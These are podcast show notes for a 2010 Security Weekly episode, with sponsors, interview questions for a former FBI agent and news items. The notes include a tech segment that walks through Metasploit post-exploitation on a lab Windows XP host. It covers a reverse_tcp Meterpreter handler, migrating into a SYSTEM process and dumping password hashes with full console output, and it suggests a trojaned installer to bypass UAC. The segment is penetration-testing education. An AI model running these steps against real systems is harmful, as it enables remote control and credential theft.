- 1 Security Weekly was nominated for the 2015 Best Security Podcast! Please vote for our show here: Security Blogger Awards
- 2 Sponsors
- 3 Shameless Plugs & General Announcements
- 4 Episode Media
- 5 Guest Interview: Eric Fiterman
- 6 Tech Segment: Carlos Perez covers the new hashdump method in Metasploit
- 7 Stories For Discussion
- 8 Other Stories Of Interest
Security Weekly was nominated for the 2015 Best Security Podcast! Please vote for our show here: Security Blogger Awards
- Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
- Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
- Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!
Shameless Plugs & General Announcements
Security Weekly - Episode 184 - For Thursday January 20th, 2010
- Upcoming webcasts - Cenzic is sponsoring a webcast on Tuesday, January 26, 2010 on tips to be a better web application penetration tester. Register TODAY!!! http://securityweekly.com/2009/12/practical-kung-fu-webcast-seri.html
- Defensive Intuition - We are also sponsored by Defensive Intuition. Defensive Intuition is the provider of many security consulting services: penetration testing, physical assessments, and social engineering. Defensive Intuition: Owning your boxes, 7 ways to Sunday!
- Community SANS: Sec 542 Web Application Penetration Testing - SANS is pleased to announce Community SANS Providence, starting March 28th. Larry will teach Security 542: Web Application Penetration Testing and Ethical Hacking. The course will be hosted by Brown University.
- Shmoocon - This will be the next big conference that we will all be attending. We will have t-shirts and other special things to give away and sell. No, we are not selling the interns (who will both be there, btw). So come find us at the booth for all things Security Weekly including free stickers, and Security Weekly complete works DVDs!
Guest Interview: Eric Fiterman
Eric is a former Special Agent with the Federal Bureau of Investigation and founder of Methodvue. He brings his experience with the FBI in investigating and testifying in complex cases involving threats against the President of the United States, industrial espionage, acts of terrorism, electronic crimes, computer intrusions, and crimes against children.
- How did you get your start in information security?
- What was your path in becoming a Special Agent?
- What's a typical agent's career/life like? Is it like "24"?
- If a sysadmin finds illegal pron on servers at work, what does the FBI recommend in terms of reporting the situation? Should the sysadmin handle their internal investigation and if so, how?
- What will you be presenting at Shmoocon?
- How do the other Virtualizations platforms compare when extracting forensic data vs. VMWare?
- How do you approach forensics investigations in the "Cloud"?
- What are your favorite forensics tools?
- Your approach at Methodvue seems to be quite different than most companies that operate in a similar space. Specifically, your "threat intelligence" model seems to be an approach that we at Security Weekly have been yelling about for a long time. How's this being received by the business community?
- Your IR/Forensics approach appears to be more holistic than traditional offerings at other security providers. What are the things IR/Forensics pros need to do to "up" their game?
- Please expound on the governance component of Methodvue's mission statement "Methodvue is a private intelligence organization specializing in the discovery and deterrence of complex threats to people, commerce, and governance." The tech side is great at protecting the tech... but we (as an industry in general) are really awful at the "non tech" portion of security. What are some of the bigger gaps and how can we address them?
- What experiments did you perform on NASA's "Vomit Comet"?
- Yesterday, you published an article on dealing with China in the post-Aurora world. What are your thoughts on what happened to Google?
Tech Segment: Carlos Perez covers the new hashdump method in Metasploit
Very recently HD Moore added to the Metasploit Framework a script called hashdump. As the name implies, its purpose is to dump the hashes of Windows systems like the priv command in Meterpreter of the same name. However, this script differs in the way it achieves this. Most hashdumping tools inject code into the lsass process so as to be able to dump hashes. Many antivirus and HIPS vendors are now hooking also in to the process to prevent this, but sadly this method may cause the target machine to crash when they block this type of access.
This is where this script comes along, it simply reads the registry keys and decrypts them to show the hashes, by reading the registry keys direcly and not hooking the lsass process. This method is safer but it does have the following limitations:
- It has to be run as System.
- It is slower than using the injection method.
Lets see how it would be run against a system running Windows XP/2003. First we set the multi handler to receive our Meterpreter shells
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.100 LHOST => 192.168.1.100 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j -z [*] Exploit running as background job. msf exploit(handler) > [*] Starting the payload handler... [*] Started reverse handler on port 4444
Now we receive a shell and we check the OS to determine if we are Administrator on the box:
[*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.1.224:4444 -> 192.168.1.138:49595) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: WINXPLAB01 OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > getuid Server username: WINXPLAB01\labuser meterpreter > shell Process 1088 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\labuser\Desktop>net localgroup administrators net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator labuser The command completed successfully. C:\Documents and Settings\labuser\Desktop>exit
So we have checked that the account we are running under is part of the local Administrators group, this is important because the Priv module needs these privileges to run:
meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578::: labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a::: meterpreter >
Now if we run as Administrator the hashdump script it fails
meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669... [-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5 [-] This script requires the use of a SYSTEM user context (hint: migrate into service process) meterpreter >
There are several ways around this in Windows 2003 and Windows XP systems:
- Exploit that provides System privileges
- Installing a Service or Driver that provides Shell
- Scheduling a Payload to run as a System
- Migrating in to a process running under the privileges of System
Lets try migrating to service running under this privilege:
meterpreter > ps Process list ============ PID Name Arch User Path --- ---- ---- ---- ---- 0 [System Process] x86 4 System x86 ? 472 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 596 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 620 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 672 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 684 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 836 vmacthlp.exe x86 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 848 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 932 svchost.exe x86 C:\WINDOWS\system32\svchost.exe 1040 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1124 svchost.exe x86 C:\WINDOWS\system32\svchost.exe 1196 svchost.exe x86 C:\WINDOWS\system32\svchost.exe 1396 explorer.exe x86 WINXPLAB01\labuser C:\WINDOWS\Explorer.EXE 1580 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1664 VMwareTray.exe x86 WINXPLAB01\labuser C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1672 VMwareUser.exe x86 WINXPLAB01\labuser C:\Program Files\VMware\VMware Tools\VMwareUser.exe 188 VMwareService.exe x86 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMwareService.exe 536 wscntfy.exe x86 WINXPLAB01\labuser C:\WINDOWS\system32\wscntfy.exe 1156 alg.exe x86 C:\WINDOWS\System32\alg.exe 1332 wuauclt.exe x86 WINXPLAB01\labuser C:\WINDOWS\system32\wuauclt.exe 1180 meter_224.exe x86 WINXPLAB01\labuser C:\Documents and Settings\labuser\Deskto\meter_224.exe meterpreter > migrate 1040 [*] Migrating to 1040... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a::: labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
As it can be seen, we enumerated the processes and we migrated in to the pid 1040, once migrated we check under what privileges we are running under and execute the script. On Windows Vista/7 and 2008 this is more limited, to run both types of hashdump you must be running as System and UAC in Vista and 7 block the installation of services, drivers and scheduling of tasks, to make it more difficult the enhancement on the new version also blocks the migration to a process running as System. On Windows 2008 if running with Administrator privileges we can schedule tasks, install drivers and sevices but migration is also blocked. A way to bypass the UAC prompt is to have the target user install it for us with a trojaned Installer forcing the user to run it with updated privileges!
Stories For Discussion
- Major Virus Outbreak AT Univerisity - [Paul Asadoorian] - Wow, I've been there for sure! I think enough time has passed where I can speak more candidly about what its like to do incident reponse in that environment. Its challenging, you need patience, more patience, and scotch, lots of scotch. They did say they were seeing stuff that no one else has seen. this is quite possible, we would often get malware samples before anyone else. Why? Its almost as if the black hats used Universities as a testing ground to see how stuff would perform and react. seriously.
- IE 0-day - big deal? - [Paul Asadoorian] - wow, where to begin? what a load of FUD. One thing I take issue with is the advice being published by many sources, including Microsoft, before the patch was released was to upgrade to the latest version of Internet Explorer (Version 8). In addition, it was recommended that users enable DEP on all Windows systems and be certain that Service Pack 3 is installed if the system is running Windows XP. The recommended technology has been available for quite some time, so this is a good opportunity to be proactive with your security program. Don't let an unpatched vulnerability that is receiving tons of press dictate your security program.
- OSVDB Interview with Jake Kouns - [Paul Asadoorian] - This was an interview I did on the Tenable podcast. I found out more stuff about OSVDB, and I really like it. Not only does the search feature rock, but there is so much there. For instance, you can create watch lists to track vendors and sofware vulnerabilities. Also, you can subscribe to one mailing list which is an aggregate of several security lists from vendors. It totally rocks. Make sure you sign up and make a donation.
- Vulnerability in 32-bit Windows Kernel Could Allow Elevation of Privilege - [mikep] -Looks like this one has been hanging around for 17 years! Read on for Microsoft Security Advisory (979682) details.
- Weak passwords are easy to guess - [Mick] - I know, I know obvious right? But what's kinda cool is that this is the New York Times. Maybe, just maybe folks will learn. BWAGAGHAHHA!!! OK well, at least we can't say they weren't warned.
- 17 year old what? - [Mick] - and I get squirely about how the bugs that are open for over half a year. Sheesh!
- Wait! That's my Password1234! - [ strandjs] - Nothing like easy to guess passwords. This is a repeat. People use crappy passwords.
- Taking a network down to clean up - [ strandjs ] - This is odd. A University takes its network down to clean up an outbreak. But… They are a university…??? Wont they get re-infected in like… 5 minutes?
- Welcome to hell - [ strandjs] - Attackers are switching to targeted attacks. This sucks for a number of reasons. Detection is going to get harder. We will tell you why. But trust me.. This sucks.
- Kindle Apps? - [Mick] - Very interesting. Now I have an API for when I... err, Bob pwns your Kindle.